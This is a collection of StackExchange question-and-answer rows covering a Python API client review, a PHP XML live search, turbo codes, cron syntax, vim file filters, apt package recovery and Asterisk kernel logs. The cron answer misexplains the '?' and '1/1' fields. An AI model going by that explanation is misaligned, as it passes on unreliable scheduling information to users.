        # Convert json to df for easier subsetting & to calculate cumulative sum.
        df = pd.DataFrame(r_volume.json()['volume'])
        df['startDate'] = pd.to_datetime(df['startDate'])
        df['endDate'] = pd.to_datetime(df['endDate'])

        l_dates = []
        while True:
            df['cumulative_sum'] = df['numberOfDocuments'].cumsum()
            # Find the span whose cumulative sum is below the threshold.
            df_below = df[df['cumulative_sum'] <= max_documents]
            # If there are 0 rows under threshold.
            if (df_below.empty):
                # If there are still rows left, use the first row.
                if len(df) > 0:
                    # This entry will have over 10k, but we can't go more
                    # granular than one day.
                    df_below = df.iloc[0:1]
                else:
                    break
            # Take the first row's start date and last row's end date.
            from_ = df_below['startDate'].iloc[0].date()
            to_ = df_below['endDate'].iloc[-1].date()
            l_dates.append([from_, to_])
            # Reassign df to remaining portion.
            df = df[df['startDate'] >= to_]

        return l_dates

    def plot_volume(self, r_volume):
        """Plots a time-series chart with two axes to show the daily and
        cumulative document count."""
        # Convert r to df, fix datetime, add cumulative sum.
        df_volume = pd.DataFrame(r_volume.json()['volume'])
        df_volume['startDate'] = pd.to_datetime(df_volume['startDate'])
        df_volume['endDate'] = pd.to_datetime(df_volume['endDate'])
        df_volume['cumulative_sum'] = df_volume['numberOfDocuments'].cumsum()

        fig, ax1 = plt.subplots()
        ax2 = ax1.twinx()
        df_volume['numberOfDocuments'].plot(ax=ax1, style='b-')
        df_volume['cumulative_sum'].plot(ax=ax2, style='r-')
        ax1.set_ylabel('Number of Documents')
        ax2.set_ylabel('Cumulative Sum')
        h1, l1 = ax1.get_legend_handles_labels()
        h2, l2 = ax2.get_legend_handles_labels()
        ax1.legend(h1+h2, l1+l2, loc=2)
        plt.show()
        return

    def make_data_pipeline(self, from_, to_):
        """Combines the functions in this class to make a robust pipeline
        that loops through each day in a time period. Data is returned as a
        dataframe."""
        # Get the volume over time data.
        r_volume = self.get_data_from_endpoint(from_, to_, 'volume')
        print('There are approximately {} documents.'.format(r_volume.json()['numberOfDocuments']))
        self.plot_volume(r_volume)

        # Carve up time into buckets of volume <10k.
        l_dates = self.get_dates_from_timespan(r_volume)

        data = []
        for i in trange(len(l_dates), leave=False):
            from_, to_ = l_dates[i]
            # Pull posts.
            r_posts = self.get_data_from_endpoint(from_, to_, 'posts')
            if r_posts.ok and (r_posts.json()['status'] != 'error'):
                j_result = json.loads(r_posts.content.decode('utf8'))
                data.extend(j_result['posts'])

        l_flat= [flatten(d) for d in data]
        df = pd.DataFrame(l_flat)
        return df


if __name__ == "__main__":
    # Credentials.
    username = 'xxxxx'
    password = 'xxxxx'
    # Monitor id - taken from URL on website.
    monitor_id = '123'

    # Instantiate client.
    crimson_api = CrimsonHexagonClient(username, password, monitor_id)

    from_ = date(2017, 1, 1)
    to_ = date(2017, 6, 30)

    # Combine class functions into a typical workflow.
    df = crimson_api.make_data_pipeline(from_, to_) | Python API for Crimson Hexagon | python;api;pandas |

Readability & Style

Imports

Remove the modules that you're not using (dateutil).

Imports should be grouped in the following order:

1. standard library imports
2. related third party imports
3. local application/library specific imports

Code layout

You should surround top-level function and class definitions with two blank lines.

Whitespace in Expressions and Statements

Avoid extraneous whitespace before/after any operator (in your case, =) and between two lines of code.

Comments

You have some comments which don't add any value to your code. Get rid of them. (E.g.: # Credentials., # Instantiate client.)

Should you use OOP?

You've created all your code by using a class, but you didn't actually make use of it. 80% of your methods are static, which makes me think you shouldn't need to use a class. Try to reorganise your code by splitting it into smaller functions and create classes only if you need to communicate state between your methods or you need one of the OOP principles (inheritance, polymorphism etc).

PS: As a side note, this is entirely subjective.

More on the code

You're not using self.last_response anywhere. Remove it.

In the _auth and plot_volume methods, the return statement is redundant. Remove it.

In the make_data_pipeline method, don't create useless variables. Instead, you can directly return pd.DataFrame(l_flat).

You don't need parentheses here: if (df_below.empty).

You should really add some try/except blocks, at least when you're authenticating against the API, and let the user know whether something went wrong or not.
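To make the last review points concrete, here is a minimal, self-contained sketch (the function names below are invented for illustration and are not part of the original code):

```python
# Before: the shape the review criticises in make_data_pipeline,
# i.e. a throwaway variable bound immediately before the return.
def summarise_before(counts):
    total = sum(counts)
    result = {'total': total}
    return result

# After: return the expression directly; no intermediate binding
# and no bare trailing return needed.
def summarise_after(counts):
    return {'total': sum(counts)}
```

Both behave identically; the second simply drops the bindings the review calls useless.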
_webmaster.104344 | Hi, I have been wondering how to make a live search on my movie website, and I'm trying to do it without a database. So I decided to go with PHP and XML. This is my code so far; please help me fix this error.

This is my error:

load("movie.xml");
$x=$xmlDoc->getElementsByTagName('movie');

//get the q parameter from URL
$q=$_GET["q"];

//lookup all links from the xml file if length of q>0
if (strlen($q)>0) {
    $hint="";
    for($i=0; $i<($x->length); $i++) {
        $y=$x->item($i)->getElementsByTagName('title');
        $z=$x->item($i)->getElementsByTagName('genre');
        if ($y->item(0)->nodeType==1) {
            //find a link matching the search text
            if (stristr($y->item(0)->childNodes->item(0)->nodeValue,$q)) {
                if ($hint=="") {
                    $hint= . $y->item(0)->childNodes->item(0)->nodeValue . ;
                } else {
                    $hint=$hint . . $y->item(0)->childNodes->item(0)->nodeValue . ;
                }
            }
        }
    }
}

// Set output to "no suggestion" if no hint was found
// or to the correct values
if ($hint=="") {
    $response="no suggestion";
} else {
    $response=$hint;
}

//output the response
echo $response;
?>

This is my XML movie file: http://webdam.inria.fr/Jorge/files/movies.xml

This is my HTML code. File name: livesearch.html

This is my PHP code: getmovie.php | How to fix xml and php live search | html;php;search;error;xml | null
_cstheory.33488 | I'm self-studying turbo codes for a graduate course in coding theory. I understood how turbo codes work by directly reading Berrou's paper and some of the follow-up works on this topic. Given that, there is a simple question that I cannot answer by myself.

Turbo codes rely on the fundamental principle of message passing during iterative decoding; more formally speaking, the extrinsic information produced by one decoder is passed as a priori information to the next (companion) decoder. This is my problematic point: why should extrinsic information, which is an a posteriori computation (obtained from the log-likelihood ratio), be passed as a priori information to the next decoder?

The LLR can be expressed as:

$$L(u_i)=\log\frac{P(u_i=1|\text{observation})}{P(u_i=0|\text{observation})}=\log\frac{p(\text{obs.}|u_i=1)}{p(\text{obs.}|u_i=0)}+\log\frac{P(u_i=1)}{P(u_i=0)}$$

What if the a priori knowledge of the source is known? For example, suppose an independent binary source, so that $P(0)=P(1)=1/2$. In this case there is no need to update the a priori knowledge because it is exactly equal to $0$, while the extrinsic information is, in general, different from $0$, so the estimate is wrong at each step.

Thanks in advance. | Turbo codes and message passing | it.information theory;message passing | null
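For context on the three terms being discussed: the turbo-decoding literature usually splits the a posteriori LLR of a systematic code on an AWGN channel one step further (this decomposition is not stated in the question above; it is the standard one from the literature):

$$L(\hat{u}_i)=\underbrace{L_c\,y_i^{s}}_{\text{channel}}+\underbrace{L_a(u_i)}_{\text{a priori}}+\underbrace{L_e(u_i)}_{\text{extrinsic}}$$

with channel reliability $L_c=4E_s/N_0$. Only the extrinsic term $L_e$ is exchanged between the component decoders, precisely so that a decoder never receives back its own a priori or channel contributions.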
_unix.16541 | I need to go through all my CSS and JS files, and if there is a filename referenced that has any slashes (/) in it at all, the slashes should be removed. What I want is:

If any referenced file is named /file.jpg, remove the leading slash, leaving just file.jpg. For example, in a CSS file, change @import url(/base.css); to @import url(base.css);

If the referenced file is named /files/file.jpg, the leading slash and the folder name should be removed, leaving just file.jpg.

I started to write it, but then couldn't think of how to deal with the slashes:

grep -o -h -E '[A-Za-z0-9:./_-]+\.(png|jpg|gif|tif|css)' `find ${new_directory} -name '*.css' -or -name '*.js'`

Any idea how to do this? I am doing this in a .sh shell script. | Remove slashes/parent paths from filenames inside CSS and Javascript content | shell;text processing;find | null
_webmaster.65746 | I have a simple funnel situation. Users start at /start/. Some of them reach the result at /result/, and obviously some don't. So it seems logical to me that:

users who went to the start page = users who saw the result page afterwards + users who did NOT see the result page afterwards

However, my results are:

users who went to the start page << users who saw the result page afterwards + users who did NOT see the result page afterwards

"users who saw the result page afterwards" is smaller than "users who went to the start page" and has about the same pageview ratio as the API calls tell me. "users who did NOT see the result page afterwards" is just 10% smaller than "users who went to the start page".

The calls are run via the spreadsheet add-in to the API. All three calls share these attributes:

Metric: ga:users
no filter
are for the last 30 days
Sampling: HIGHER_PRECISION

The segments differ for each call:

users::sequence::ga:pagePath=~/start/$
users::sequence::ga:pagePath=~/start/$;->>ga:pagePath=~/result/.*
users::sequence::ga:pagePath=~/start/$;->>ga:pagePath!~/result/.* | Sum of completed and not completed doesn't add up correctly in the Google Analytics API | google analytics;analytics api;regular expression | null
_codereview.70040 | Looking at this Typeclassopedia exercise, I typed out foldTree on the following type:

data ITree a = Leaf (Int -> a) | Node [ITree a]

And my implementation of Functor:

instance Functor (ITree) where
    fmap = iTreeMap

iTreeMap :: (a -> b) -> ITree a -> ITree b
iTreeMap f (Leaf x)  = Leaf $ fmap f x
iTreeMap f (Node xs) = Node $ map (iTreeMap f) xs

Please critique its signature, correctness and style. | Implementing Functor Instance for `ITree` | haskell;tree | null
_unix.171054 | By convention, our C++ headers live in .hpp files. When I open a gvim window with a .cpp file (so C++ source), then use the open menus, I get a file chooser window which allows me to select files for:

C++ Source Files (*.cpp, *.c++)
C Header Files (*.h)
C Source Files (*.c)
All Files (*.*)

Clearly, none of those will match just C++ headers -- whatever the extension is. So, my question is: How do I create a new entry for C++ Header Files (*.hpp, *.h++)?

Bonus: How do I add (*) to the All Files option? I guess this will be the same method as above. | C++ header/source files in file chooser | vim;gvim | This can be configured via a buffer-local b:browsefilter variable, which is set in filetype plugins; for C/C++, $VIMRUNTIME/ftplugin/c.vim. To change / override this, just put the following into ~/.vim/after/ftplugin/cpp.vim:

let b:browsefilter = "C++ Source Files (*.cpp *.c++)\t*.cpp;*.c++\n" .
    \ "C Header Files (*.hpp, *.h++)\t*.hpp;*.h++\n" .
    \ "C Source Files (*.c)\t*.c\n" .
    \ "All Files (*.*)\t*.*\n"
_datascience.11632 | I'm totally new to machine learning. The first confusing concept is "subspace". In multi-label classification we have to share the subspace. What does one mean by that "shared subspace"? | What is a subspace and what is a shared subspace? | machine learning;classification;statistics;multilabel classification | null
_unix.186294 | I have an ssh-agent running on my local machine. I connect to a remote machine via SSH, with agent forwarding enabled. On that remote there is an instance of gpg-agent running.

I know that recent versions of gpg-agent (2.1+) have the command-line flag --extra-socket, which you can use to have the agent retrieve not only the keys added to it, but also keys from a forwarded gpg-agent.

However, I don't have gpg-agent running on my local machine; I have ssh-agent. Is there a way to have gpg-agent retrieve SSH keys from that forwarded ssh-agent? | How do I combine SSH agent forwarding and gpg-agent? | gpg;ssh agent | null
_datascience.1090 | It may be unlikely that anyone knows this, but I have a specific question about Freebase. Here is the Freebase page for the Ford Taurus automotive model. It has a property called Related Models. Does anyone know how this list of related models was compiled? What is the similarity measure that they use? I don't think it is only about other Wikipedia pages that link to or from this page. Alternatively, it may be that this is user generated. Does anyone know for sure? | Freebase Related Models | dataset | null
_unix.114192 | This is with reference to "sudo: apt-get: command not found" after removing some packages. This user managed to break his system by installing some packages from wheezy on a squeeze system - not sure why or how. In any case, he has at least two packages which are not fully installed and are in the state iU (i.e. unpacked only). What is an efficient way to list all packages that are not fully installed or, putting it differently, partially installed?

This seems like something that might have already been asked, but a quick search did not uncover anything. If it is a duplicate, please close. | Listing Debian packages which are not fully installed | debian;dpkg | From the dpkg man page:

-C, --audit
    Searches for packages that have been installed only partially on your
    system. dpkg will suggest what to do with them to get them working.

So dpkg -C may work. However, I can't test this since I don't have any broken packages.
_unix.230658 | When I run yum install X, where X can be tomcat or any other package, what are the user and the permissions on the packages it downloads? | Permissions and user for yum download | security;yum | null
_codereview.172379 | I have to update the user's email and password if they are present in the params; I also have other user information which can be updated.

This is the method I have written, but it doesn't seem like a good method:

def update
  if user_params[:current_email].present?
    if @current_user.has_valid_email?(user_params[:current_email])
      @current_user.update(email: user_params[:new_email])
    else
      render json: {errors: ["Current Email did not match!"]}, status: :unprocessable_entity and return
    end
  end

  if user_params[:current_password].present?
    if @current_user.has_valid_password?(user_params[:current_password])
      @current_user.update(password: user_params[:new_password])
    else
      render json: {errors: ["Current Password did not match!"]}, status: :unprocessable_entity and return
    end
  end

  if @current_user.update(sanitized_params)
    @web_user = @current_user
    render :show
  else
    render json: {errors: @current_user.errors.full_messages}, status: :unprocessable_entity
  end
end

private

def sanitized_params
  user_params.slice!(:current_email, :new_email, :current_password, :new_password)
end

def user_params
  params.permit(:current_email, :new_email, :current_password, :new_password, :password_confirmation, :reminders_frequency, :coaching_style, :coaching_style_status, :suggestion_preference, :language, :region)
end | Refactored code for updating user password, email and other info | ruby;ruby on rails | null
_webmaster.108935 | I want to know what the Google Analytics events are for users that come frequently, i.e. more than 5 times, to my website. Google Analytics gives the count of sessions by user frequency (under the Behaviour > Frequency & Recency tab), but there is no way to know what actions were taken by the high-frequency users. | What are the events related to high-frequency users? | google analytics | null
_reverseengineering.3865 | I'm trying to catch the epilogue/prologue of functions in IDAPython. Does anyone have a clue/snippet/algorithm for how I should do this? | Detecting epilogue/prologue of functions | ida;idapro plugins;idapython;static analysis;functions | null
_webapps.70477 | Is there a way I can copy/paste or download old DMs from my iPhone 6? I cannot see DMs as far back as I need on my computer. | Download direct messages from Twitter | twitter;twitter direct message | null
_unix.229078 | I got a cron format like this: 0 0 12 1/1 * ? *. How do I read it, and what does it mean? I understand the fields without a slash, but not this one. | cron job with slash | cron | Slashes mean step values (the step has to be something that the maximum value of the element in question is divisible by) at which the execution will take place. The first value is the range, so say 0-30, and the second value is the frequency, so for example 5. If the value was 0-30/5 in the minutes column, it would execute every five minutes within the range of 0-30 minutes.

Question marks mean that whenever the first execution takes place, cron grabs the corresponding value for the element using a question mark, and puts the value at that time into it. This means that if, say, you start the execution via cron for the first time on a Monday and the day-of-week value is a ?, it'll change it to Monday, so it runs on Monday permanently.

Quick run-down of the values:

0 - first column, the 0th minute - this is what minute to execute on.
0 - second column, the 0th hour - this is the hour of execution.
12 - the 12th day of the month - this is the day of the month to execute on.
1/1 - this means it is to be executed once a month (right-hand side 1), with the range locked down to the first month (left-hand side 1). If my understanding is correct, this is the same as having 1 alone.
* - this is the value for the day of the week - an asterisk means it'll be repeated every day of the week.

This looks like it'll run at 00:00 on the 12th of the first month of the year, regardless of the day of the week.

I'm not sure why there are seven values, as standard cron files only have five or six values as far as I'm aware (the sixth being the year, as viewable in the documentation below - but it is not included in standard/default deployments of cron).
I'd also suggest having a read through the documentation, as it's great reference material for learning how they are structured:https://en.wikipedia.org/wiki/Cron |
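The field-by-field reading above, and the slash expansion, can be sketched in Python (a toy illustration that follows the answer's labels, not a full cron parser):

```python
def label_cron_fields(expr):
    """Pair each field of the 7-field expression with the label the
    answer assigns to it (the last two fields are the unexplained ones)."""
    labels = ['minute', 'hour', 'day of month', 'month',
              'day of week', 'extra', 'extra']
    return list(zip(labels, expr.split()))

def expand_step_field(field, start_default=0, maximum=59):
    """Expand a range/step field such as '0-30/5' into the values it
    matches, following the answer's slash explanation."""
    rng, _, step = field.partition('/')
    step = int(step) if step else 1
    start, _, end = rng.partition('-')
    if rng == '*':
        start, end = start_default, maximum
    else:
        start = int(start)
        end = int(end) if end else start
    return list(range(start, end + 1, step))
```

For example, expand_step_field('0-30/5') gives [0, 5, 10, 15, 20, 25, 30], matching the answer's every-five-minutes-within-0-30 reading, and expand_step_field('1/1') gives [1], matching the answer's guess that 1/1 behaves like a plain 1.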
_cogsci.165 | What are the works/papers/results/theories any expert in cognitive science should know, even if they're outside his/her specific field of expertise?

One paper/theory per answer please, and state why you find this work important to know (and ideally, not just because it has lots of citations, or because everyone teaches it at Cognitive Science 101). | What are the Must Know papers of Cognitive Science? | cognitive psychology;reference request | null
_scicomp.7189 | I am looking to port some code that solves a set of partial differential equations (PDEs) by the finite volume method, in IMPLICIT form (for the time discretization).

As a result there is a tridiagonal system of equations in the x, y, z directions, which is handled by the ADI/TDMA scheme.

I cannot seem to find anything regarding implicit solution of PDEs with CUDA. Is the ADI/TDMA scheme possible to implement in CUDA? Is there an example like the 2D heat diffusion equation available somewhere?

All I could find is a CUDA sample code for the 2D heat diffusion equation in finite differences, but in EXPLICIT form (University of Cambridge). Any hint/reference would be greatly appreciated. | cuda and numerical methods with implicit time discretization | parallel computing;implicit methods;cuda | null
_unix.215215 | I was trying to install the normal map plugin for GIMP, and I tried installing the package gimp-normalmap:i386 from the Software Manager on Linux Mint. As I was installing it, I realized that it was removing a number of important packages: one of my video editors, GIMP, several Python packages, and the Cinnamon desktop environment. I closed out of the Software Manager as fast as I could (because there wasn't an abort button), but it had already removed most of those packages. It turns out that the package I was originally looking for was gimp-normalmap. Now I can't adjust anything that has to do with my desktop environment, and all the settings are missing. What is the best way to restore all the packages removed by this software? Also, Cinnamon is offered as a package in the Software Manager. Is it safe to install this? Preferably, I would also like to get back all the Python files it removed, and I can't figure out which ones those were even if I go back to the package in the Software Manager. | How to restore packages removed by installing a program | linux mint;software installation;apt | I believe you can check what has been installed or uninstalled etc. via the aptitude logs. You will need to be root or use sudo to view the log files.

You can check the logs using this command:

sudo cat /var/log/apt/term.log

For long log files you can pipe to more, like this:

sudo cat /var/log/apt/term.log | more

Then you can use the space bar to page down, enter to go down one line at a time, and q to quit. There's lots more you can do via more. To learn more, try man, like this:

man more

You should be able to see what was uninstalled/removed. That way you can reinstall what you think you may need, or just reinstall everything before you made that last change.

If it's been a while, older logs are gzip'ed, so you can go back in history as well.
You will need to extract those before you can read them via cat or a text editor.

Once you determine what was uninstalled, you can reinstall the packages by using:

sudo apt-get install --reinstall package1 package2

package1 being one of the packages you saw in the log file; just list them all out, using spaces between each one, to install multiple packages at once.
_unix.219921 | I use Asterisk 11 in my Ubuntu Server 14.04, but I Have some problems with my Dahdi Driver, with conflits Please see the dmesg (null) [ 11.804460] Adding 2052092k swap on /dev/mapper/asterisk--vg-swap_1. Priority:-1 extents:1 across:2052092k FS [ 12.027643] systemd-udevd[327]: starting version 204 [ 12.709180] lp: driver loaded but no devices found [ 12.715263] parport_pc 00:02: reported by Plug and Play ACPI [ 12.715315] parport0: PC-style at 0x378 (0x778), irq 7, using FIFO [PCSPP,TRISTATE,COMPAT,ECP] [ 12.812123] lp0: using parport0 (interrupt-driven). [ 12.818748] mei_me 0000:00:03.0: irq 44 for MSI/MSI-X [ 12.877965] Floppy drive(s): fd0 is 1.44M [ 12.922603] ACPI Warning: SystemIO range 0x0000000000000828-0x000000000000082F conflicts with OpRegion 0x0000000000000828-0x000000000000082D (\GLBC) (20140424/utaddress-254) [ 12.922609] ACPI Warning: SystemIO range 0x0000000000000828-0x000000000000082F conflicts with OpRegion 0x000000000000082A-0x000000000000082A (\SACT) (20140424/utaddress-254) [ 12.922613] ACPI Warning: SystemIO range 0x0000000000000828-0x000000000000082F conflicts with OpRegion 0x0000000000000828-0x0000000000000828 (\SSTS) (20140424/utaddress-254) [ 12.922617] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 12.922621] ACPI Warning: SystemIO range 0x00000000000008B0-0x00000000000008BF conflicts with OpRegion 0x00000000000008B8-0x00000000000008BB (\GIC2) (20140424/utaddress-254) [ 12.922624] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 12.922626] ACPI Warning: SystemIO range 0x0000000000000880-0x00000000000008AF conflicts with OpRegion 0x000000000000088C-0x000000000000088F (\GIC1) (20140424/utaddress-254) [ 12.922630] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 12.922631] lpc_ich: Resource conflict(s) found affecting gpio_ich [ 13.038153] shpchp: Standard Hot Plug 
PCI Controller Driver version: 0.4 [ 13.117951] dcdbas dcdbas: Dell Systems Management Base Driver (version 5.6.0-3.2) [ 13.216281] ppdev: user-space parallel port driver [ 13.272719] audit: type=1400 audit(1438608815.729:2): apparmor=STATUS operation=profile_load profile=unconfined name=/sbin/dhclient pid=368 comm=apparmor_parser [ 13.272726] audit: type=1400 audit(1438608815.729:3): apparmor=STATUS operation=profile_load profile=unconfined name=/usr/lib/NetworkManager/nm-dhcp-client.action pid=368 comm=apparmor_parser [ 13.272732] audit: type=1400 audit(1438608815.729:4): apparmor=STATUS operation=profile_load profile=unconfined name=/usr/lib/connman/scripts/dhclient-script pid=368 comm=apparmor_parser [ 13.272742] audit: type=1400 audit(1438608815.729:5): apparmor=STATUS operation=profile_replace profile=unconfined name=/sbin/dhclient pid=367 comm=apparmor_parser [ 13.272749] audit: type=1400 audit(1438608815.729:6): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/NetworkManager/nm-dhcp-client.action pid=367 comm=apparmor_parser [ 13.272755] audit: type=1400 audit(1438608815.729:7): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/connman/scripts/dhclient-script pid=367 comm=apparmor_parser [ 13.273205] audit: type=1400 audit(1438608815.729:8): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/NetworkManager/nm-dhcp-client.action pid=368 comm=apparmor_parser [ 13.273210] audit: type=1400 audit(1438608815.729:9): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/connman/scripts/dhclient-script pid=368 comm=apparmor_parser [ 13.273227] audit: type=1400 audit(1438608815.729:10): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/NetworkManager/nm-dhcp-client.action pid=367 comm=apparmor_parser [ 13.273233] audit: type=1400 audit(1438608815.729:11): apparmor=STATUS operation=profile_replace profile=unconfined 
name=/usr/lib/connman/scripts/dhclient-script pid=367 comm=apparmor_parser [ 13.313689] [drm] Initialized drm 1.1.0 20060810 [ 13.492498] kvm: disabled by bios [ 13.674866] snd_hda_intel 0000:00:1b.0: irq 45 for MSI/MSI-X [ 13.740542] r8169 0000:03:02.0 eth1: link down [ 13.740557] r8169 0000:03:02.0 eth1: link down [ 13.740587] IPv6: ADDRCONF(NETDEV_UP): eth1: link is not ready [ 13.769644] Velocity is AUTO mode [ 13.784400] coretemp coretemp.0: Using relative temperature scale! [ 13.784413] coretemp coretemp.0: Using relative temperature scale! [ 14.093137] [drm] Memory usable by graphics device = 512M [ 14.093143] checking generic (d0000000 300000) vs hw (d0000000 10000000) [ 14.093145] fb: switching to inteldrmfb from VESA VGA [ 14.093183] Console: switching to colour dummy device 80x25 [ 14.093311] [drm] Replacing VGA console driver [ 14.116059] i915 0000:00:02.0: irq 46 for MSI/MSI-X [ 14.116069] [drm] Supports vblank timestamp caching Rev 2 (21.10.2013). [ 14.116070] [drm] Driver supports precise vblank timestamp query. 
[ 14.116143] vgaarb: device changed decodes: PCI:0000:00:02.0,olddecodes=io+mem,decodes=io+mem:owns=io+mem [ 14.117085] [drm] initialized overlay support [ 14.164931] sound hdaudioC0D0: autoconfig: line_outs=1 (0x12/0x0/0x0/0x0/0x0) type:line [ 14.164936] sound hdaudioC0D0: speaker_outs=1 (0x13/0x0/0x0/0x0/0x0) [ 14.164939] sound hdaudioC0D0: hp_outs=1 (0x11/0x0/0x0/0x0/0x0) [ 14.164941] sound hdaudioC0D0: mono: mono_out=0x0 [ 14.164943] sound hdaudioC0D0: inputs: [ 14.164945] sound hdaudioC0D0: Mic=0x14 [ 14.164947] sound hdaudioC0D0: Line=0x15 [ 14.172144] input: HDA Intel Mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input7 [ 14.172977] input: HDA Intel Line as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 14.173069] input: HDA Intel Line Out as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 14.174879] input: HDA Intel Front Headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input10 [ 14.236951] fbcon: inteldrmfb (fb0) is primary device [ 14.253794] Console: switching to colour frame buffer device 160x50 [ 14.256574] i915 0000:00:02.0: fb0: inteldrmfb frame buffer device [ 14.256576] i915 0000:00:02.0: registered panic notifier [ 14.260148] [drm] Initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 15.430560] EXT4-fs (dm-0): re-mounted. Opts: errors=remount-ro [ 15.500869] r8169 0000:03:02.0 eth1: link up [ 15.500879] IPv6: ADDRCONF(NETDEV_CHANGE): eth1: link becomes ready [ 15.771290] EXT4-fs (sda1): mounting ext2 file system using the ext4 subsystem [ 15.900036] floppy0: no floppy controllers found [ 15.964264] EXT4-fs (sda1): mounted filesystem without journal. 
Opts: (null) [ 16.222275] init: failsafe main process (708) killed by TERM signal [ 16.567280] eth0: Link auto-negotiation speed 1000M bps full duplex [ 21.311317] ip_tables: (C) 2000-2006 Netfilter Core Team [ 21.363286] nf_conntrack version 0.5.0 (16384 buckets, 65536 max) [ 21.562313] init: plymouth-upstart-bridge main process ended, respawning [ 492.184127] init: tty1 main process ended, respawningAfter then I run dahdi_cfg -vvv my Dahdi CLI back, but the problem continue [ 11.503468] kvm: disabled by bios [ 11.507542] coretemp coretemp.0: Using relative temperature scale! [ 11.507556] coretemp coretemp.0: Using relative temperature scale! [ 11.518417] vgaarb: device changed decodes: PCI:0000:00:02.0,olddecodes=io+mem,decodes=io+mem:owns=io+mem [ 11.520280] [drm] initialized overlay support [ 11.527372] dcdbas dcdbas: Dell Systems Management Base Driver (version 5.6.0-3.2) [ 11.590852] ppdev: user-space parallel port driver [ 11.597260] audit: type=1400 audit(1438610748.051:2): apparmor=STATUS operation=profile_load profile=unconfined name=/sbin/dhclient pid=367 comm=apparmor_parser [ 11.597268] audit: type=1400 audit(1438610748.051:3): apparmor=STATUS operation=profile_load profile=unconfined name=/usr/lib/NetworkManager/nm-dhcp-client.action pid=367 comm=apparmor_parser [ 11.597274] audit: type=1400 audit(1438610748.051:4): apparmor=STATUS operation=profile_load profile=unconfined name=/usr/lib/connman/scripts/dhclient-script pid=367 comm=apparmor_parser [ 11.597283] audit: type=1400 audit(1438610748.051:5): apparmor=STATUS operation=profile_replace profile=unconfined name=/sbin/dhclient pid=368 comm=apparmor_parser [ 11.597291] audit: type=1400 audit(1438610748.051:6): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/NetworkManager/nm-dhcp-client.action pid=368 comm=apparmor_parser [ 11.597296] audit: type=1400 audit(1438610748.051:7): apparmor=STATUS operation=profile_replace profile=unconfined 
name=/usr/lib/connman/scripts/dhclient-script pid=368 comm=apparmor_parser [ 11.597749] audit: type=1400 audit(1438610748.051:8): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/NetworkManager/nm-dhcp-client.action pid=367 comm=apparmor_parser [ 11.597755] audit: type=1400 audit(1438610748.051:9): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/connman/scripts/dhclient-script pid=367 comm=apparmor_parser [ 11.597767] audit: type=1400 audit(1438610748.051:10): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/NetworkManager/nm-dhcp-client.action pid=368 comm=apparmor_parser [ 11.597772] audit: type=1400 audit(1438610748.051:11): apparmor=STATUS operation=profile_replace profile=unconfined name=/usr/lib/connman/scripts/dhclient-script pid=368 comm=apparmor_parser [ 11.632943] fbcon: inteldrmfb (fb0) is primary device [ 11.649799] Console: switching to colour frame buffer device 160x50 [ 11.652579] i915 0000:00:02.0: fb0: inteldrmfb frame buffer device [ 11.652581] i915 0000:00:02.0: registered panic notifier [ 11.666480] [drm] Initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 11.666586] ACPI Warning: SystemIO range 0x0000000000000828-0x000000000000082F conflicts with OpRegion 0x0000000000000828-0x000000000000082D (\GLBC) (20140424/utaddress-254) [ 11.666592] ACPI Warning: SystemIO range 0x0000000000000828-0x000000000000082F conflicts with OpRegion 0x000000000000082A-0x000000000000082A (\SACT) (20140424/utaddress-254) [ 11.666596] ACPI Warning: SystemIO range 0x0000000000000828-0x000000000000082F conflicts with OpRegion 0x0000000000000828-0x0000000000000828 (\SSTS) (20140424/utaddress-254) [ 11.666600] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 11.666603] ACPI Warning: SystemIO range 0x00000000000008B0-0x00000000000008BF conflicts with OpRegion 0x00000000000008B8-0x00000000000008BB (\GIC2) (20140424/utaddress-254) [ 
11.666607] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 11.666609] ACPI Warning: SystemIO range 0x0000000000000880-0x00000000000008AF conflicts with OpRegion 0x000000000000088C-0x000000000000088F (\GIC1) (20140424/utaddress-254) [ 11.666613] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 11.666614] lpc_ich: Resource conflict(s) found affecting gpio_ich [ 11.670169] snd_hda_intel 0000:00:1b.0: irq 46 for MSI/MSI-X [ 12.009628] r8169 0000:03:02.0 eth1: link down [ 12.009643] r8169 0000:03:02.0 eth1: link down [ 12.009680] IPv6: ADDRCONF(NETDEV_UP): eth1: link is not ready [ 12.037647] Velocity is AUTO mode [ 12.057030] sound hdaudioC0D0: autoconfig: line_outs=1 (0x12/0x0/0x0/0x0/0x0) type:line [ 12.057034] sound hdaudioC0D0: speaker_outs=1 (0x13/0x0/0x0/0x0/0x0) [ 12.057037] sound hdaudioC0D0: hp_outs=1 (0x11/0x0/0x0/0x0/0x0) [ 12.057039] sound hdaudioC0D0: mono: mono_out=0x0 [ 12.057041] sound hdaudioC0D0: inputs: [ 12.057044] sound hdaudioC0D0: Mic=0x14 [ 12.057046] sound hdaudioC0D0: Line=0x15 [ 12.068312] input: HDA Intel Mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input7 [ 12.068434] input: HDA Intel Line as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 12.068543] input: HDA Intel Line Out as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 12.068648] input: HDA Intel Front Headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input10 [ 12.450564] EXT4-fs (dm-0): re-mounted. Opts: errors=remount-ro [ 13.032211] EXT4-fs (sda1): mounting ext2 file system using the ext4 subsystem [ 13.178789] EXT4-fs (sda1): 